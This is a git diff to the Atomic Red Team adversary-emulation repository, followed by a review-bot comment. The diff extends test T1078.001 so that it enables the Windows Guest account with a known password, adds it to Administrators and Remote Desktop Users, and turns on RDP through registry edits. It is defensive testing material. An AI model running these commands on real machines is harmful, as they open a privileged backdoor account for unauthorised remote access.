diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index a5b35358..19864175 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -24,7 +24,7 @@ privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced fil privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt -privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt 
@@ -103,7 +103,7 @@ persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057f persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt -persistence,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt 
@@ -239,7 +239,7 @@ defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt -defense-evasion,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell 
@@ -663,6 +663,6 @@ exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Al exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual -initial-access,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 679edd90..26fb4981 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -19,7 +19,7 @@ privilege-escalation,T1546.015,Component Object Model Hijacking,2,COM Hijack Lev privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt -privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt 
@@ -74,7 +74,7 @@ defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt -defense-evasion,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell 
@@ -210,7 +210,7 @@ persistence,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging S persistence,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt -persistence,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt 
@@ -457,6 +457,6 @@ lateral-movement,T1021.006,Windows Remote Management,3,WMIC Process Call Create, lateral-movement,T1021.006,Windows Remote Management,4,Psexec,9bab84a1-08fd-4245-b681-e62c78283002,command_prompt lateral-movement,T1021.006,Windows Remote Management,5,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell lateral-movement,T1021.006,Windows Remote Management,6,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell -initial-access,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 3d49031c..cb0e5563 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -49,7 +49,7 @@ - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account [windows] + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
@@ -224,7 +224,7 @@ - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account [windows] + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -501,7 +501,7 @@ - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account [windows] + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md) - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows] @@ -1262,7 +1262,7 @@ - T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account [windows] + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 75fab71d..074b4d35 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -40,7 +40,7 @@ - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account [windows] + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -159,7 +159,7 @@ - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account [windows] + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md) - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows] - Atomic Test #2: Certutil Rename and Decode [windows] 
@@ -412,7 +412,7 @@ - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account [windows] + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -953,7 +953,7 @@ - T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account [windows] + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 9eaee27c..1258b69f 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -2359,20 +2359,27 @@ privilege-escalation: - SaaS identifier: T1078.001 atomic_tests: - - name: Enable Guest account + - name: Enable Guest account with RDP capability and admin priviliges auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 description: After execution the Default Guest account will be enabled (Active) - and added to Administrators Group + and added to Administrators and Remote Desktop Users Group, and desktop will + allow multiple RDP connections supported_platforms: - windows executor: - command: | + command: |- net user guest /active:yes - net user guest Paswword123! + net user guest Password123! net localgroup administrators guest /add + net localgroup "Remote Desktop Users" guest /add + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f cleanup_command: |- net user guest /active:no net localgroup administrators guest /delete + net localgroup "Remote Desktop Users" guest /delete + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f name: command_prompt elevation_required: true T1078.002: 
@@ -10806,20 +10813,27 @@ persistence: - SaaS identifier: T1078.001 atomic_tests: - - name: Enable Guest account + - name: Enable Guest account with RDP capability and admin priviliges auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 description: After execution the Default Guest account will be enabled (Active) - and added to Administrators Group + and added to Administrators and Remote Desktop Users Group, and desktop will + allow multiple RDP connections supported_platforms: - windows executor: - command: | + command: |- net user guest /active:yes - net user guest Paswword123! + net user guest Password123! net localgroup administrators guest /add + net localgroup "Remote Desktop Users" guest /add + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f cleanup_command: |- net user guest /active:no net localgroup administrators guest /delete + net localgroup "Remote Desktop Users" guest /delete + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f name: command_prompt elevation_required: true T1136.002: 
@@ -23211,20 +23225,27 @@ defense-evasion: - SaaS identifier: T1078.001 atomic_tests: - - name: Enable Guest account + - name: Enable Guest account with RDP capability and admin priviliges auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 description: After execution the Default Guest account will be enabled (Active) - and added to Administrators Group + and added to Administrators and Remote Desktop Users Group, and desktop will + allow multiple RDP connections supported_platforms: - windows executor: - command: | + command: |- net user guest /active:yes - net user guest Paswword123! + net user guest Password123! net localgroup administrators guest /add + net localgroup "Remote Desktop Users" guest /add + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f cleanup_command: |- net user guest /active:no net localgroup administrators guest /delete + net localgroup "Remote Desktop Users" guest /delete + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f name: command_prompt elevation_required: true T1578.003: 
@@ -52115,20 +52136,27 @@ initial-access: - SaaS identifier: T1078.001 atomic_tests: - - name: Enable Guest account + - name: Enable Guest account with RDP capability and admin priviliges auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 description: After execution the Default Guest account will be enabled (Active) - and added to Administrators Group + and added to Administrators and Remote Desktop Users Group, and desktop will + allow multiple RDP connections supported_platforms: - windows executor: - command: | + command: |- net user guest /active:yes - net user guest Paswword123! + net user guest Password123! net localgroup administrators guest /add + net localgroup "Remote Desktop Users" guest /add + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f cleanup_command: |- net user guest /active:no net localgroup administrators guest /delete + net localgroup "Remote Desktop Users" guest /delete + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f name: command_prompt elevation_required: true T1078.002: diff --git a/atomics/T1078.001/T1078.001.md b/atomics/T1078.001/T1078.001.md index 9ff1ac35..2c32dc26 100644 --- a/atomics/T1078.001/T1078.001.md +++ b/atomics/T1078.001/T1078.001.md @@ -6,13 +6,13 @@ Default accounts are not limited to client machines, rather also include account ## Atomic Tests -- [Atomic Test #1 - Enable Guest account](#atomic-test-1---enable-guest-account) +- [Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges](#atomic-test-1---enable-guest-account-with-rdp-capability-and-admin-priviliges)
-## Atomic Test #1 - Enable Guest account -After execution the Default Guest account will be enabled (Active) and added to Administrators Group +## Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges +After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections **Supported Platforms:** Windows @@ -24,14 +24,20 @@ After execution the Default Guest account will be enabled (Active) and added to ```cmd net user guest /active:yes -net user guest Paswword123! +net user guest Password123! net localgroup administrators guest /add +net localgroup "Remote Desktop Users" guest /add +reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f ``` #### Cleanup Commands: ```cmd net user guest /active:no net localgroup administrators guest /delete +net localgroup "Remote Desktop Users" guest /delete +reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f +reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f ```
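Review bot: The cleanup in the last hunk removes `fDenyTSConnections` and `AllowTSConnections` with `reg delete` instead of restoring them, so a host that started with RDP disabled (`fDenyTSConnections` = 1, the usual default) is left with the value absent rather than its original setting; prefer `reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f` and only delete `AllowTSConnections` if it did not exist before the test. The cleanup also leaves the Guest account with the known password `Password123!` set, which is a residual weakness if the account is ever re-enabled; either reset it in the cleanup or state in the description that the password persists. The description claims the desktop "will allow multiple RDP connections", but none of the commands shown touch session limits (e.g. `fSingleSessionPerUser`) or the Remote Desktop firewall rule group, so the wording should be narrowed to what the commands do — enable RDP via `fDenyTSConnections`=0 — with a note that inbound 3389 may still be blocked by Windows Firewall. Finally, "priviliges" in the test name is misspelled ("privileges") and propagates into every generated index in this commit, and the source atomic YAML these indexes are generated from is not in the visible diff, so the fix presumably belongs there.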